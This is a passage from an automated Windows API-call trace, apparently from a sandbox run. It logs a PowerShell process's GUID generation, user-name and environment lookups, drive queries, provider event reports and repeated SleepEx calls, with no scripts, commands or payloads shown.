pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x51414efe, Data2=0xcb7f, Data3=0x4447, Data4=([0]=0xbd, [1]=0x57, [2]=0x4, [3]=0x50, [4]=0xa9, [5]=0x44, [6]=0xc6, [7]=0xdd))) returned 0x0 [0197.786] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x4901b2da, Data2=0x5b81, Data3=0x42d6, Data4=([0]=0xb6, [1]=0xe9, [2]=0x43, [3]=0x95, [4]=0xa7, [5]=0x6b, [6]=0x34, [7]=0xe6))) returned 0x0 [0197.787] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xd7976259, Data2=0xe423, Data3=0x4f47, Data4=([0]=0x83, [1]=0x27, [2]=0x67, [3]=0xcc, [4]=0x92, [5]=0xcd, [6]=0x8c, [7]=0xcf))) returned 0x0 [0197.787] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x39fe7ac6, Data2=0x27b4, Data3=0x458e, Data4=([0]=0xad, [1]=0xad, [2]=0x39, [3]=0x12, [4]=0xb0, [5]=0xd7, [6]=0x1d, [7]=0x6c))) returned 0x0 [0197.788] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xcc6489c1, Data2=0x1858, Data3=0x4526, Data4=([0]=0x9c, [1]=0xcd, [2]=0xe7, [3]=0x95, [4]=0x1a, [5]=0x4e, [6]=0xdf, [7]=0x40))) returned 0x0 [0197.788] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x4f1201be, Data2=0xc6ff, Data3=0x47e0, Data4=([0]=0xb8, [1]=0xbc, [2]=0x2a, [3]=0x4a, [4]=0x67, [5]=0xdc, [6]=0xee, [7]=0xbc))) returned 0x0 [0197.788] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xe2dd5fb4, Data2=0xd54, Data3=0x4e10, Data4=([0]=0x88, [1]=0x74, [2]=0x8f, [3]=0x26, [4]=0xde, [5]=0x7a, [6]=0xe2, [7]=0x16))) returned 0x0 [0197.789] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xf2264cce, Data2=0x68e6, Data3=0x4760, Data4=([0]=0xaa, [1]=0x67, [2]=0xaf, [3]=0x16, [4]=0x91, [5]=0xf5, [6]=0xd3, [7]=0x8f))) returned 0x0 [0197.789] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xbfa78aba, Data2=0x3087, Data3=0x409a, Data4=([0]=0xb5, [1]=0x39, [2]=0xa4, [3]=0x73, [4]=0xd4, [5]=0x96, [6]=0x7d, [7]=0xef))) returned 0x0 [0197.789] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x94a0e4e4, Data2=0xce32, Data3=0x4e16, Data4=([0]=0xbb, [1]=0x28, [2]=0x59, [3]=0x30, [4]=0xec, [5]=0x9a, [6]=0xd0, [7]=0xc8))) returned 0x0 [0197.790] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xb17adf92, Data2=0xc7ae, Data3=0x449a, Data4=([0]=0xa6, [1]=0x4f, [2]=0x87, [3]=0x36, [4]=0xf9, [5]=0x2, [6]=0xc5, [7]=0xe8))) returned 0x0 [0197.790] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x3433cd24, Data2=0xb85c, Data3=0x44ce, Data4=([0]=0x90, [1]=0x5f, [2]=0x0, [3]=0x43, [4]=0x11, [5]=0xbf, [6]=0xd2, [7]=0x9b))) returned 0x0 [0197.790] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xa67d8764, Data2=0x617e, Data3=0x4f22, Data4=([0]=0x9f, [1]=0xbb, [2]=0xe2, [3]=0xe7, [4]=0x4f, [5]=0x29, [6]=0xda, [7]=0x35))) returned 0x0 [0197.790] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x1bec46fe, Data2=0xc22f, Data3=0x4395, Data4=([0]=0x8a, [1]=0xee, [2]=0xe1, [3]=0xef, [4]=0x4c, [5]=0x3f, [6]=0xc1, [7]=0xb9))) returned 0x0 [0197.791] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x24df735e, Data2=0xbe6a, Data3=0x4e9e, Data4=([0]=0xbc, [1]=0x3d, [2]=0x50, [3]=0xb2, [4]=0x43, [5]=0x1f, [6]=0x10, [7]=0xce))) returned 0x0 [0197.791] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x77ffcd5e, Data2=0xcf3a, Data3=0x4178, Data4=([0]=0x92, [1]=0x6a, [2]=0x4a, [3]=0xd4, [4]=0x5b, [5]=0x25, [6]=0x9f, [7]=0xe2))) returned 0x0 [0197.791] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x6224fc2a, Data2=0x8954, Data3=0x4dcd, Data4=([0]=0xaf, [1]=0x81, [2]=0x66, [3]=0x37, [4]=0xa3, [5]=0x3c, [6]=0x7d, [7]=0x83))) returned 0x0 [0197.792] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x5ce7c049, Data2=0xee1d, Data3=0x4d92, Data4=([0]=0xab, [1]=0x34, [2]=0xfc, [3]=0xd4, [4]=0x97, [5]=0x80, [6]=0x90, [7]=0xbd))) returned 0x0 [0197.792] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0xbe35c38a, Data2=0x4d5c, Data3=0x4c26, Data4=([0]=0xac, [1]=0x9d, [2]=0x7, [3]=0xa0, [4]=0xa, [5]=0x4c, [6]=0x1e, [7]=0x22))) returned 0x0 [0197.792] CoCreateGuid (in: pguid=0x7daed74 | out: pguid=0x7daed74*(Data1=0x2ebfa9f5, Data2=0x3ec2, Data3=0x4f92, Data4=([0]=0x99, [1]=0x4f, [2]=0x18, [3]=0x6, [4]=0xdc, [5]=0xd5, [6]=0xc8, [7]=0xef))) returned 0x0 [0197.799] CoTaskMemAlloc (cb=0x804) returned 0x3244b40 [0197.799] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3244b40, nSize=0x7daf000 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x7daf000) returned 0x1 [0197.801] CoTaskMemFree (pv=0x3244b40) [0197.801] GetUserNameW (in: lpBuffer=0x7daed94, pcbBuffer=0x7daf00c | out: lpBuffer="FD1HVy", pcbBuffer=0x7daf00c) returned 1 [0197.805] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5693490*="Registry", lpRawData=0x56933b8) returned 1 [0197.811] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x56954c4*="Alias", lpRawData=0x56953ec) returned 1 [0197.816] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x56975d4*="Environment", lpRawData=0x56974fc) returned 1 [0197.817] CoTaskMemAlloc (cb=0x24c) returned 0x31fd1b0 [0197.817] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x31fd1b0, nSize=0x124 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0197.817] CoTaskMemFree (pv=0x31fd1b0) [0197.817] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x104, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0197.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7daef8c) returned 1 [0197.817] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy"), fInfoLevelId=0x0, lpFileInformation=0x7daf008 | out: lpFileInformation=0x7daf008*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0197.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7daef88) returned 1 [0197.818] GetLogicalDrives () returned 0x4 [0197.819] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0197.819] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0197.819] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7daef78) returned 1 [0197.819] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x7daee80, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x7daefa0, lpMaximumComponentLength=0x7daef9c, lpFileSystemFlags=0x7daef98, lpFileSystemNameBuffer=0x7daee18, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x7daefa0*=0xb4197730, lpMaximumComponentLength=0x7daef9c*=0xff, lpFileSystemFlags=0x7daef98*=0x3e702ff, lpFileSystemNameBuffer="NTFS") returned 1 [0197.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7daef74) returned 1 [0197.820] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.820] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.820] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0197.820] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0197.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7daef30) returned 1 [0197.820] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x569835c | out: lpFileInformation=0x569835c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x865407b, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0x865407b, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0197.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7daef2c) returned 1 [0197.821] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0197.821] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0197.821] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.821] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.821] PathIsNetworkPathW (pszPath="C:\\") returned 0 [0197.821] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0197.821] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0197.821] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.821] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.822] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0197.823] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5699ef4*="FileSystem", lpRawData=0x5699e1c) returned 1 [0197.956] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5704a38*="Function", lpRawData=0x5704960) returned 1 [0197.960] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5706a80*="Variable", lpRawData=0x57069a8) returned 1 [0197.961] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.464] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.575] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.792] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.473] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.567] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.848] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.004] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.051] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.133] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.185] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.276] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.369] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.529] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.728] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.857] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.410] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.596] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.831] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.913] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.002] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.274] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0222.367] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.309] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.338] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.338] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.343] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.343] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.343] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.343] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.345] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.356] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.406] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.422] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.449] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.449] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.449] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.480] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.490] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.491] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.500] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.502] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.531] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0227.543] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.677] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.677] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.683] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.683] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.686] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.687] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.689] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.691] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.691] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.692] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.694] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.699] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.700] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.701] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.716] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.716] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.731] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.746] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.746] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.749] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.750] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 38 os_tid = 0x1270 Thread: id = 39 os_tid = 0x1180 [0187.295] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0187.621] RoInitialize () returned 0x1 [0187.621] RoUninitialize () returned 0x0 [0187.625] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x87fefcc*=0x6a4, lpdwindex=0x87fedec | out: lpdwindex=0x87fedec) returned 0x0 [0187.632] SetThreadUILanguage (LangId=0x0) returned 0xe80409 [0188.475] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x87feea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x87feea8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xad, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0188.523] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x87fee14*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x87fee14*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0188.524] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x87fee98*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xad, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x87fee98*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xad, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0188.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x87fe464, nSize=0x80 | out: lpBuffer="ᦙﵚက澪က澪") returned 0x0 [0188.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x87fe464, nSize=0x80 | out: lpBuffer="ᦙﵚက澪က澪") returned 0x0 [0188.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x87fe450, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0188.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x87fe420, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0188.955] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x87feb00, nSize=0x80 | out: lpBuffer="") returned 0xc3 [0188.956] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x87fea78, nSize=0xc3 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc2 [0188.965] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0188.973] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x104, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0188.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87feb48) returned 1 [0188.973] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x87febc4 | out: lpFileInformation=0x87febc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0189.025] SetThreadErrorMode (dwNewMode=0x0, 